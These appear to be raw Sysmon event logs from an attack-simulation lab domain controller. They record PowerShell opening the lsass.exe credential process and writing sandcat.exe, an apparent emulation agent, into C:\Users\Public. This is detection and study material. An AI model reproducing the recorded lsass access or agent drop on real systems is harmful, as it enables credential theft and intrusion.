08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001020Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.433{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-0E00-000000007F01}1092C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001019Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.402{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A1-5F84-1500-000000007F01}1324C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001018Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.371{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-2100-000000007F01}2444C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001017Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.371{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-1F00-000000007F01}2304C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001016Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.371{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-1B00-000000007F01}2220C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001015Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.371{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-1A00-000000007F01}2212C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:10.324{5D479F2C-16A2-5F84-1800-000000007F01}21282812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-16A2-5F84-1E00-000000007F01}2284C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b335c|UNKNOWN(00007FFD965A3F41) 11241100x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.localEXE2020-10-12 08:41:09.777{5D479F2C-16A2-5F84-1900-000000007F01}2204C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Public\sandcat.exe2020-10-12 08:41:09.777 10341000x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.340{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.340{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.340{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.308{5D479F2C-16A1-5F84-1000-000000007F01}11442364C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.308{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.293{5D479F2C-169F-5F84-0500-000000007F01}648664C:\Windows\system32\csrss.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.293{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A5-5F84-2200-000000007F01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.277{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.277{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-169F-5F84-0B00-000000007F01}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.277{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.277{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.277{5D479F2C-169F-5F84-0B00-000000007F01}86496C:\Windows\system32\lsass.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:09.183{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A2-5F84-1C00-000000007F01}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:08.933{5D479F2C-169F-5F84-0B00-000000007F01}864904C:\Windows\system32\lsass.exe{5D479F2C-16A2-5F84-1C00-000000007F01}2228C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 